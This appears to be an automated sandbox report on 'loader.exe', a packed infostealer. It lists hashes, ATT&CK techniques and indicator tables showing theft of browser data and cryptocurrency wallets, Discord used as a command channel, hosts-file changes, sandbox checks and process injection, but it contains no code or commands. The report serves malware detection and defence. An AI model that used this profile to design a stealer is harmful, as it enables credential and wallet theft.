d6203f1da96afa4addda97161bf7097c6bf7a859529c84096cba75c9b5b7a9f5

Analysis

max time kernel
210s
max time network
221s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
04-07-2024 17:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader.exe
Size

5.1MB
MD5

2d2c21d68b9b76bdba29ff76fe429073
SHA1

7ba1ce6306190b83cc5520b07a94bd9774800d32
SHA256

d6203f1da96afa4addda97161bf7097c6bf7a859529c84096cba75c9b5b7a9f5
SHA512

11231d8742f882386dcf3a5797da67568a3f74fa01a979f9c9d4f87048695aa11d10b0adac91e597b1bfe6ee378390211498afaf6b9915d53defa260a365c08d
SSDEEP

98304:4gXdZyA3ow8HpaoBbuWqOd/SlQQXLJ3Axqz6aAbTPV17nMRM3La:HYwKn5Hd/CTNYq+aAbDsRT

Score

8^/10

defense_evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

loader.exe

flow pid process

164 4892 loader.exe
166 4892 loader.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3408 powershell.exe
5724 powershell.exe
5976 powershell.exe
4364 powershell.exe
5100 powershell.exe
3076 powershell.exe
336 powershell.exe
2220 powershell.exe
1952 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

loader.exeloader.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts loader.exe
File opened for modification C:\Windows\System32\drivers\etc\hosts loader.exe

flow	pid	process
164	4892	loader.exe
166	4892	loader.exe

pid	process
3408	powershell.exe
5724	powershell.exe
5976	powershell.exe
4364	powershell.exe
5100	powershell.exe
3076	powershell.exe
336	powershell.exe
2220	powershell.exe
1952	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI14322\python310.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\libcrypto-1_1.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_ssl.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_sqlite3.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_socket.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_queue.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_lzma.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_hashlib.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_decimal.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_bz2.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\unicodedata.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\sqlite3.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\select.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\libssl-1_1.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\libffi-7.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_ctypes.pyd	acprotect

Executes dropped EXE 12 IoCs

Processes:

rar.exeloader.exeloader.exeloader.exeloader.exerar.exeloader.exeloader.exeloader.exeloader.exeloader.exeloader.exe

pid process

3652 rar.exe
1176 loader.exe
4892 loader.exe
2740 loader.exe
5068 loader.exe
4400 rar.exe
5160 loader.exe
4468 loader.exe
2140 loader.exe
5724 loader.exe
5216 loader.exe
2360 loader.exe

pid	process
3652	rar.exe
1176	loader.exe
4892	loader.exe
2740	loader.exe
5068	loader.exe
4400	rar.exe
5160	loader.exe
4468	loader.exe
2140	loader.exe
5724	loader.exe
5216	loader.exe
2360	loader.exe

Loads dropped DLL 64 IoCs

Processes:

loader.exeloader.exeloader.exeloader.exe

pid	process
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
3948	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
4892	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
5068	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe
4468	loader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI14322\python310.dll	upx
behavioral1/memory/3948-25-0x0000000074BA0000-0x0000000074FE3000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\libssl-1_1.dll	upx
behavioral1/memory/3948-32-0x0000000074AE0000-0x0000000074AEC000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\libffi-7.dll	upx
behavioral1/memory/3948-30-0x0000000074AF0000-0x0000000074B0F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14322\_ctypes.pyd	upx
behavioral1/memory/3948-54-0x0000000074AB0000-0x0000000074AD7000-memory.dmp	upx
behavioral1/memory/3948-56-0x0000000074A90000-0x0000000074AA5000-memory.dmp	upx
behavioral1/memory/3948-58-0x0000000074A70000-0x0000000074A85000-memory.dmp	upx
behavioral1/memory/3948-60-0x0000000074940000-0x0000000074A6F000-memory.dmp	upx
behavioral1/memory/3948-62-0x0000000074920000-0x0000000074936000-memory.dmp	upx
behavioral1/memory/3948-64-0x00000000748D0000-0x00000000748DC000-memory.dmp	upx
behavioral1/memory/3948-67-0x00000000748A0000-0x00000000748C8000-memory.dmp	upx
behavioral1/memory/3948-68-0x0000000074800000-0x0000000074894000-memory.dmp	upx
behavioral1/memory/3948-72-0x00000000745A0000-0x00000000747FC000-memory.dmp	upx
behavioral1/memory/3948-71-0x0000000074BA0000-0x0000000074FE3000-memory.dmp	upx
behavioral1/memory/3948-75-0x0000000074AF0000-0x0000000074B0F000-memory.dmp	upx
behavioral1/memory/3948-76-0x0000000074530000-0x0000000074540000-memory.dmp	upx
behavioral1/memory/3948-78-0x0000000074520000-0x000000007452C000-memory.dmp	upx
behavioral1/memory/3948-80-0x00000000743F0000-0x0000000074504000-memory.dmp	upx
behavioral1/memory/3948-318-0x0000000074A70000-0x0000000074A85000-memory.dmp	upx
behavioral1/memory/3948-376-0x0000000074940000-0x0000000074A6F000-memory.dmp	upx
behavioral1/memory/3948-361-0x0000000074BA0000-0x0000000074FE3000-memory.dmp	upx
behavioral1/memory/3948-375-0x00000000743F0000-0x0000000074504000-memory.dmp	upx
behavioral1/memory/3948-371-0x0000000074800000-0x0000000074894000-memory.dmp	upx
behavioral1/memory/3948-370-0x00000000748A0000-0x00000000748C8000-memory.dmp	upx
behavioral1/memory/3948-368-0x0000000074920000-0x0000000074936000-memory.dmp	upx
behavioral1/memory/3948-366-0x0000000074A70000-0x0000000074A85000-memory.dmp	upx
behavioral1/memory/3948-362-0x0000000074AF0000-0x0000000074B0F000-memory.dmp	upx
behavioral1/memory/3948-372-0x00000000745A0000-0x00000000747FC000-memory.dmp	upx
behavioral1/memory/3948-398-0x0000000074BA0000-0x0000000074FE3000-memory.dmp	upx
behavioral1/memory/3948-418-0x0000000074A70000-0x0000000074A85000-memory.dmp	upx
behavioral1/memory/3948-427-0x00000000743F0000-0x0000000074504000-memory.dmp	upx
behavioral1/memory/3948-415-0x0000000074AE0000-0x0000000074AEC000-memory.dmp	upx
behavioral1/memory/3948-426-0x0000000074520000-0x000000007452C000-memory.dmp	upx
behavioral1/memory/3948-425-0x0000000074530000-0x0000000074540000-memory.dmp	upx
behavioral1/memory/3948-424-0x00000000745A0000-0x00000000747FC000-memory.dmp	upx
behavioral1/memory/3948-423-0x0000000074800000-0x0000000074894000-memory.dmp	upx
behavioral1/memory/3948-422-0x00000000748A0000-0x00000000748C8000-memory.dmp	upx
behavioral1/memory/3948-421-0x00000000748D0000-0x00000000748DC000-memory.dmp	upx
behavioral1/memory/3948-420-0x0000000074920000-0x0000000074936000-memory.dmp	upx
behavioral1/memory/3948-419-0x0000000074940000-0x0000000074A6F000-memory.dmp	upx
behavioral1/memory/3948-417-0x0000000074A90000-0x0000000074AA5000-memory.dmp	upx
behavioral1/memory/3948-416-0x0000000074AB0000-0x0000000074AD7000-memory.dmp	upx
behavioral1/memory/3948-414-0x0000000074AF0000-0x0000000074B0F000-memory.dmp	upx
behavioral1/memory/3948-428-0x0000000074BA0000-0x0000000074FE3000-memory.dmp	upx
behavioral1/memory/4892-1079-0x0000000074B00000-0x0000000074F43000-memory.dmp	upx
behavioral1/memory/4892-1080-0x0000000074A50000-0x0000000074A6F000-memory.dmp	upx
behavioral1/memory/4892-1081-0x0000000074A40000-0x0000000074A4C000-memory.dmp	upx
behavioral1/memory/4892-1086-0x0000000074A10000-0x0000000074A37000-memory.dmp	upx
behavioral1/memory/4892-1089-0x00000000748A0000-0x00000000749CF000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

166 discord.com
30 discord.com
31 discord.com
165 discord.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

163 ip-api.com
18 ip-api.com
25 ip-api.com
151 ip-api.com
Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.execmd.execmd.exe

pid process

2708 cmd.exe
4028 cmd.exe
916 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
166	discord.com
30	discord.com
31	discord.com
165	discord.com

flow	ioc
163	ip-api.com
18	ip-api.com
25	ip-api.com
151	ip-api.com

pid	process
2708	cmd.exe
4028	cmd.exe
916	cmd.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Detects videocard installed 1 TTPs 8 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

740 WMIC.exe
3140 WMIC.exe
4220 WMIC.exe
1112 WMIC.exe
4600 WMIC.exe
5160 WMIC.exe
2220 WMIC.exe
2956 WMIC.exe

pid	process
740	WMIC.exe
3140	WMIC.exe
4220	WMIC.exe
1112	WMIC.exe
4600	WMIC.exe
5160	WMIC.exe
2220	WMIC.exe
2956	WMIC.exe

Enumerates processes with tasklist 1 TTPs 15 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
2484	tasklist.exe
3056	tasklist.exe
436	tasklist.exe
6084	tasklist.exe
5040	tasklist.exe
5444	tasklist.exe
2352	tasklist.exe
2196	tasklist.exe
5704	tasklist.exe
5704	tasklist.exe
4668	tasklist.exe
5112	tasklist.exe
2724	tasklist.exe
1528	tasklist.exe
1052	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exesysteminfo.exe

pid process

1200 systeminfo.exe
2960 systeminfo.exe
5640 systeminfo.exe

pid	process
1200	systeminfo.exe
2960	systeminfo.exe
5640	systeminfo.exe

Kills process with taskkill 34 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2132	taskkill.exe
5692	taskkill.exe
5796	taskkill.exe
5552	taskkill.exe
1344	taskkill.exe
5852	taskkill.exe
5192	taskkill.exe
3920	taskkill.exe
972	taskkill.exe
1420	taskkill.exe
3764	taskkill.exe
5652	taskkill.exe
3876	taskkill.exe
5232	taskkill.exe
2304	taskkill.exe
972	taskkill.exe
3044	taskkill.exe
4672	taskkill.exe
1736	taskkill.exe
5304	taskkill.exe
5340	taskkill.exe
6096	taskkill.exe
5308	taskkill.exe
4228	taskkill.exe
5816	taskkill.exe
5916	taskkill.exe
5944	taskkill.exe
5136	taskkill.exe
3140	taskkill.exe
1652	taskkill.exe
2028	taskkill.exe
5292	taskkill.exe
5800	taskkill.exe
4404	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133645887032483496"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 2 IoCs

Processes:

chrome.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings	OpenWith.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2960 PING.EXE
2612 PING.EXE

pid	process
2960	PING.EXE
2612	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exechrome.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
704	powershell.exe
4364	powershell.exe
704	powershell.exe
4364	powershell.exe
4364	powershell.exe
704	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe
3408	powershell.exe
3408	powershell.exe
3408	powershell.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
3492	powershell.exe
3492	powershell.exe
3492	powershell.exe
684	taskmgr.exe
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
4276	powershell.exe
4276	powershell.exe
684	taskmgr.exe
4276	powershell.exe
2820	powershell.exe
2820	powershell.exe
2820	powershell.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
3052	chrome.exe
3052	chrome.exe
2728	chrome.exe
2728	chrome.exe
3076	powershell.exe
3076	powershell.exe
3620	powershell.exe
3620	powershell.exe
3076	powershell.exe
3620	powershell.exe
336	powershell.exe
336	powershell.exe
336	powershell.exe
5656	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

Processes:

chrome.exechrome.exe

pid process

3052 chrome.exe
3052 chrome.exe
3052 chrome.exe
3052 chrome.exe
3052 chrome.exe
3052 chrome.exe
3052 chrome.exe
3052 chrome.exe
3204 chrome.exe
3204 chrome.exe
3204 chrome.exe
3204 chrome.exe

pid	process
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exetasklist.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4424	WMIC.exe
Token: SeSecurityPrivilege	4424	WMIC.exe
Token: SeTakeOwnershipPrivilege	4424	WMIC.exe
Token: SeLoadDriverPrivilege	4424	WMIC.exe
Token: SeSystemProfilePrivilege	4424	WMIC.exe
Token: SeSystemtimePrivilege	4424	WMIC.exe
Token: SeProfSingleProcessPrivilege	4424	WMIC.exe
Token: SeIncBasePriorityPrivilege	4424	WMIC.exe
Token: SeCreatePagefilePrivilege	4424	WMIC.exe
Token: SeBackupPrivilege	4424	WMIC.exe
Token: SeRestorePrivilege	4424	WMIC.exe
Token: SeShutdownPrivilege	4424	WMIC.exe
Token: SeDebugPrivilege	4424	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4424	WMIC.exe
Token: SeRemoteShutdownPrivilege	4424	WMIC.exe
Token: SeUndockPrivilege	4424	WMIC.exe
Token: SeManageVolumePrivilege	4424	WMIC.exe
Token: 33	4424	WMIC.exe
Token: 34	4424	WMIC.exe
Token: 35	4424	WMIC.exe
Token: 36	4424	WMIC.exe
Token: SeDebugPrivilege	436	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4424	WMIC.exe
Token: SeSecurityPrivilege	4424	WMIC.exe
Token: SeTakeOwnershipPrivilege	4424	WMIC.exe
Token: SeLoadDriverPrivilege	4424	WMIC.exe
Token: SeSystemProfilePrivilege	4424	WMIC.exe
Token: SeSystemtimePrivilege	4424	WMIC.exe
Token: SeProfSingleProcessPrivilege	4424	WMIC.exe
Token: SeIncBasePriorityPrivilege	4424	WMIC.exe
Token: SeCreatePagefilePrivilege	4424	WMIC.exe
Token: SeBackupPrivilege	4424	WMIC.exe
Token: SeRestorePrivilege	4424	WMIC.exe
Token: SeShutdownPrivilege	4424	WMIC.exe
Token: SeDebugPrivilege	4424	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4424	WMIC.exe
Token: SeRemoteShutdownPrivilege	4424	WMIC.exe
Token: SeUndockPrivilege	4424	WMIC.exe
Token: SeManageVolumePrivilege	4424	WMIC.exe
Token: 33	4424	WMIC.exe
Token: 34	4424	WMIC.exe
Token: 35	4424	WMIC.exe
Token: 36	4424	WMIC.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe
Token: SeCreatePagefilePrivilege	2220	WMIC.exe
Token: SeBackupPrivilege	2220	WMIC.exe
Token: SeRestorePrivilege	2220	WMIC.exe
Token: SeShutdownPrivilege	2220	WMIC.exe
Token: SeDebugPrivilege	2220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2220	WMIC.exe
Token: SeRemoteShutdownPrivilege	2220	WMIC.exe
Token: SeUndockPrivilege	2220	WMIC.exe
Token: SeManageVolumePrivilege	2220	WMIC.exe
Token: 33	2220	WMIC.exe
Token: 34	2220	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
684	taskmgr.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

OpenWith.exe

pid process

1952 OpenWith.exe
1952 OpenWith.exe
1952 OpenWith.exe
1952 OpenWith.exe
1952 OpenWith.exe

pid	process
1952	OpenWith.exe
1952	OpenWith.exe
1952	OpenWith.exe
1952	OpenWith.exe
1952	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

loader.exeloader.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1432 wrote to memory of 3948	1432	loader.exe	loader.exe
PID 1432 wrote to memory of 3948	1432	loader.exe	loader.exe
PID 1432 wrote to memory of 3948	1432	loader.exe	loader.exe
PID 3948 wrote to memory of 4844	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4844	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4844	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 2216	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 2216	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 2216	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 936	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 936	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 936	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4800	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4800	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4800	3948	loader.exe	cmd.exe
PID 4844 wrote to memory of 4364	4844	cmd.exe	powershell.exe
PID 4844 wrote to memory of 4364	4844	cmd.exe	powershell.exe
PID 4844 wrote to memory of 4364	4844	cmd.exe	powershell.exe
PID 936 wrote to memory of 436	936	cmd.exe	tasklist.exe
PID 936 wrote to memory of 436	936	cmd.exe	tasklist.exe
PID 936 wrote to memory of 436	936	cmd.exe	tasklist.exe
PID 4800 wrote to memory of 4424	4800	cmd.exe	WMIC.exe
PID 4800 wrote to memory of 4424	4800	cmd.exe	WMIC.exe
PID 4800 wrote to memory of 4424	4800	cmd.exe	WMIC.exe
PID 2216 wrote to memory of 704	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 704	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 704	2216	cmd.exe	powershell.exe
PID 3948 wrote to memory of 4368	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4368	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4368	3948	loader.exe	cmd.exe
PID 4368 wrote to memory of 4304	4368	cmd.exe	reg.exe
PID 4368 wrote to memory of 4304	4368	cmd.exe	reg.exe
